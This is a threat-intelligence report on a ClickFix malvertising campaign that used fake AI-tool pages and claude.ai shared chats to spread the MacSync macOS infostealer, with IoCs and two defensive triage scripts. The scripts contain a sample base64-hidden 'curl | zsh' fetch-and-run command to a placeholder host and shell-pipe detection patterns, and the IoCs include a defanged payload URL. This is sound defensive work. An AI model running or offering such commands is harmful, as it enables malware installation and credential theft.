Threat Actors Abuse claude.ai Shared Chat for ClickFix Malvertising Campaign

A ClickFix malvertising campaign abused Google Ads and trusted hosting to lure over 2,000 victims toward fake AI tool downloads, then pivoted to claude.ai shared chats as the delivery channel for credential-stealing malware. TrendAI Research observed six attack waves, dozens of rotating hostnames, and heavy targeting of the Asia-Pacific region, especially Taiwan, before Anthropic disabled the malicious accounts and shared conversations. #ClaudeAI #GitLabPages #MacSync #Anthropic #TrendAIResearch

Keypoints

  • The campaign used Google Ads to impersonate popular AI developer tools and drive victims to malicious download pages.
  • At least six legitimate brands were abused as lures, including Claude AI, ChatGPT Codex, Perplexity, Cursor IDE, and JetBrains.
  • TrendAI Research tracked 106 unique malicious hostnames across six attack waves over seven weeks.
  • The attackers later shifted from GitLab Pages to claude.ai’s shared chat feature, using a trusted domain to bypass common security warnings.
  • The payload chain delivered the MacSync infostealer, which collected browser credentials, cookies, SSH keys, and cryptocurrency wallet files.
  • The Asia-Pacific region accounted for the majority of confirmed victim traffic, with Taiwan the most affected country.
  • After notification, Anthropic investigated, banned the responsible accounts, and disabled the malicious shared conversations.

MITRE Techniques

  • [T1566.002] Phishing: Spearphishing Link – Victims clicked Google Ads and redirected links that led to malicious pages or claude.ai shared chats disguised as legitimate AI tool content (‘search queries for “claude”, “claude download” redirected to the previously mentioned malicious /share/ urls’).
  • [T1204.004] User Execution: Malicious Copy and Paste – The attack relied on victims copying a command from the lure page and pasting it into the macOS Terminal themselves to launch the payload (‘open Terminal and paste a command’).
  • [T1059.004] Command and Scripting Interpreter: Unix Shell – The pasted command and the follow-on zsh scripts fetched and executed each next stage on macOS (‘a single curl piped through base64 -d’ and ‘another zsh script with base64-encoded data will be decoded and executed’).
  • [T1027] Obfuscated Files or Information – The payload and commands were base64-encoded to hide their purpose from the victim and from inspection (‘base64-encoded data’ and ‘The encoded blob in the screenshots decodes to’).
  • [T1105] Ingress Tool Transfer – The pasted command fetched a loader script, which in turn retrieved the MacSync infostealer from a remote host (‘the loader script fetches and executes the MacSync infostealer’).
  • [T1583.001] Acquire Infrastructure: Domains – The actors registered and rotated many malicious hostnames and subdomains to host lure pages (‘106 unique malicious hostnames’ and ‘created dozens of subdomains mimicking legitimate software download pages’).
  • [T1583.006] Acquire Infrastructure: Web Services – The campaign abused GitLab Pages and the claude.ai shared chat feature as hosting and delivery infrastructure (‘abused GitLab Pages’ and ‘weaponized claude.ai’s shared chat feature’).
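The execution chain above (a pasted one-liner that pipes curl output through base64 -d into zsh, which decodes a further base64-encoded stage) is the part an analyst has to unpick by hand from a lure screenshot. The following triage helper is an added example, not code from TrendAI Research or from the campaign: it peels nested base64 stages out of a command string, lists the URLs and hosts each stage reaches, and flags the fetch-or-decode-then-pipe-to-shell shape that defines ClickFix. The sample lure, the example-staging.invalid host and the build token are constructed for the demonstration and are not indicators from the report.

```python
"""Triage a ClickFix-style 'paste this into Terminal' one-liner.

Peels nested base64 stages (the 'curl piped through base64 -d' and
'zsh script with base64-encoded data' pattern described above) and
reports what each decoded stage fetches, decodes and pipes into a shell.
"""
import base64
import re
from typing import Dict, List
from urllib.parse import urlparse

# Constructed sample lure, not an indicator from the report: stage 2 is a
# fetch-and-run of a loader script on a placeholder host; stage 1 hides it
# inside a base64 blob exactly the way the page describes.
STAGE2 = "curl -fsSL https://example-staging.invalid/debug/loader.sh?build=deadbeef | zsh"
SAMPLE_CMD = "echo %s | base64 -d | zsh" % base64.b64encode(STAGE2.encode()).decode()

URL_RE = re.compile(r"""https?://[^\s'"|;&)]+""")
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")  # runs long enough to hide a command
FETCH_RE = re.compile(r"\b(?:curl|wget)\b")
DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")  # macOS accepts -D, newer builds -d
PIPE_SHELL_RE = re.compile(r"\|\s*(?:/bin/)?(?:ba|z|da)?sh\b")  # '| zsh', '| /bin/bash', '| sh'


def _decode_blobs(text: str) -> List[str]:
    """Return every base64 run in text that decodes to printable text."""
    decoded_stages = []
    # URL paths ('/debug/loader') look like base64 runs; blank them out first.
    for match in B64_RE.finditer(URL_RE.sub(" ", text)):
        blob = match.group(0)
        try:
            raw = base64.b64decode(blob + "=" * (-len(blob) % 4), validate=True)
            text_out = raw.decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue  # random hex or binary, not an encoded stage
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text_out):
            decoded_stages.append(text_out)
    return decoded_stages


def triage(command: str, max_depth: int = 5) -> Dict[str, object]:
    """Decode up to max_depth nested stages and summarise the chain."""
    stages = [command]
    frontier = [command]
    for _ in range(max_depth):
        frontier = [s for stage in frontier for s in _decode_blobs(stage)]
        if not frontier:
            break
        stages.extend(frontier)

    urls = sorted({u for stage in stages for u in URL_RE.findall(stage)})
    hosts = sorted({urlparse(u).hostname for u in urls if urlparse(u).hostname})
    fetches = any(FETCH_RE.search(s) for s in stages)
    decodes = any(DECODE_RE.search(s) for s in stages)
    pipes = any(PIPE_SHELL_RE.search(s) for s in stages)
    return {
        "stage_count": len(stages),
        "stages": stages,
        "urls": urls,
        "hosts": hosts,
        "fetches_remote": fetches,
        "decodes_base64": decodes,
        "pipes_to_shell": pipes,
        # ClickFix shape: something fetched or decoded, then fed straight to a shell.
        "clickfix_pattern": pipes and (fetches or decodes),
    }


if __name__ == "__main__":
    result = triage(SAMPLE_CMD)
    for i, stage in enumerate(result["stages"], 1):
        print(f"stage {i}: {stage}")
    print("hosts:", result["hosts"], "clickfix:", result["clickfix_pattern"])
```

Feed it the text of a lure page or a line from a victim's shell history; the `hosts` list is what goes into blocking and hunting, and a `clickfix_pattern` of True with more than one stage is the signature to alert on. A plain `curl -o file` download is deliberately not flagged, since the defining step is the pipe into an interpreter, not the fetch.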

Indicators of Compromise

  • [Domains/Hostnames] Malicious lure and staging sites – claude-code-app.gitlab[.]io, claudeapp.gitlab[.]io, perplexity-platform.gitlab[.]io, and other rotating GitLab Pages hostnames.
  • [Domains/Hostnames] Additional impersonation pages – claude-desktop-lm.gitlab[.]io, cladesktop.gitlab[.]io, codexgpt.gitlab[.]io, and chatgpt-codex-app.gitlab[.]io.
  • [URL] Payload retrieval endpoint – hxxps://loserrq0j1sha8[.]com/debug/loader.sh?build=a39427f9d5bfda11277f1a58c89b7c2d, used to download the initial loader script.
  • [Shared Chat URL Pattern] Weaponized Claude shared conversations – claude[.]ai/share/?gad_source=1&gad_campaignid=&gbraid=…&gclid=…, used as the trusted delivery mechanism; the query string carries Google Ads click-tracking parameters, showing the share links were reached directly from paid search results.
  • [Google Ads Campaign ID] Paid search infrastructure – 23736589328, a campaign ID that drove much of the early traffic.
  • [Shared Conversation IDs] Malicious Claude share links – 498818d9-1ddc-4fbb-9fa7-56dfb84840b0 and at least 45 other unique share IDs.
  • [File/Script Name] Payload and malware chain – loader.sh and the MacSync infostealer, referenced as the executed shell script and final payload.
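Two of the indicators above are patterns rather than exact values: claude.ai share links reached through Google Ads click tracking, and GitLab Pages hosts whose project name mimics an AI tool brand. The proxy-log scanner below is an added example, not code from TrendAI Research, that matches the report's exact hostnames and share ID and layers those two heuristics on top. The heuristics are assumptions for the demonstration (a shared chat normally arrives from a person, not from a paid ad; brand keywords in a gitlab.io project name are unusual for legitimate vendors), the log format and all client addresses are constructed, and the 1111… and aaaa… share IDs and cursor-ide-download host are placeholders, not indicators.

```python
"""Heuristic proxy-log triage for the two delivery paths described above:
claude.ai share links reached through Google Ads click tracking, and
brand-lookalike GitLab Pages hosts. Indicators quoted from the report are
matched exactly; the two pattern checks are heuristics added here.
"""
from typing import Dict, List
from urllib.parse import parse_qs, urlparse

# Indicators from the report (re-fanged so the URL parser sees real hostnames).
IOC_HOSTS = {
    "claude-code-app.gitlab.io", "claudeapp.gitlab.io", "perplexity-platform.gitlab.io",
    "claude-desktop-lm.gitlab.io", "cladesktop.gitlab.io", "codexgpt.gitlab.io",
    "chatgpt-codex-app.gitlab.io", "loserrq0j1sha8.com",
}
IOC_SHARE_IDS = {"498818d9-1ddc-4fbb-9fa7-56dfb84840b0"}

# Google Ads click-tracking parameters seen on the weaponised share URLs.
AD_CLICK_PARAMS = {"gad_source", "gad_campaignid", "gbraid", "gclid"}
# Brands the campaign impersonated; 'cladesktop' shows why the exact IoC list
# is still needed alongside the keyword heuristic (the typosquat misses 'claude').
BRAND_KEYWORDS = ("claude", "codex", "chatgpt", "perplexity", "cursor", "jetbrains")

# Constructed log lines (timestamp, client, method, URL, status); not real traffic.
SAMPLE_LOG = """\
2026-06-01T08:12:03Z 10.0.4.21 GET https://claude.ai/share/11111111-2222-3333-4444-555555555555?gad_source=1&gclid=EXAMPLE 200
2026-06-01T08:13:40Z 10.0.4.21 GET https://claude-code-app.gitlab.io/ 200
2026-06-01T08:14:02Z 10.0.4.33 GET https://claude.ai/share/498818d9-1ddc-4fbb-9fa7-56dfb84840b0 200
2026-06-01T08:15:11Z 10.0.4.40 GET https://claude.ai/share/aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee 200
2026-06-01T08:16:55Z 10.0.4.40 GET https://docs.gitlab.com/ee/user/project/pages/ 200
2026-06-01T08:17:30Z 10.0.4.52 GET https://cursor-ide-download.gitlab.io/index.html 200
"""


def classify_url(url: str) -> List[str]:
    """Return the reasons a URL is suspicious (empty list means clean)."""
    parsed = urlparse(url)
    host = (parsed.hostname or "").lower()
    reasons = []

    if host in IOC_HOSTS:
        reasons.append("known IoC host")

    if host == "claude.ai" and parsed.path.startswith("/share/"):
        share_id = parsed.path[len("/share/"):].strip("/")
        if share_id in IOC_SHARE_IDS:
            reasons.append("known malicious share ID")
        params = set(parse_qs(parsed.query, keep_blank_values=True))
        if AD_CLICK_PARAMS & params:
            # Heuristic: a shared chat normally arrives from a person, not a paid ad.
            reasons.append("claude.ai share link carrying Google Ads click parameters")

    if host.endswith(".gitlab.io"):
        project = host[: -len(".gitlab.io")]
        if any(kw in project for kw in BRAND_KEYWORDS):
            reasons.append(f"brand-lookalike GitLab Pages host ({project})")

    return reasons


def scan_log(log: str) -> List[Dict[str, object]]:
    """Parse whitespace-separated lines and return the flagged entries."""
    hits = []
    for line in log.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # malformed line; skip rather than guess
        ts, client, _method, url, _status = fields[:5]
        reasons = classify_url(url)
        if reasons:
            hits.append({"time": ts, "client": client, "url": url, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["client"], hit["url"])
        for reason in hit["reasons"]:
            print("   -", reason)
```

Exact matches are the only findings that are confirmed by the report; the two heuristic reasons are leads for a hunt, and the ad-parameter check in particular will need tuning against a site's own baseline of how staff reach claude.ai.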


Read more: https://www.trendmicro.com/en_us/research/26/f/claudeai-shared-chat-abused-in-malvertising.html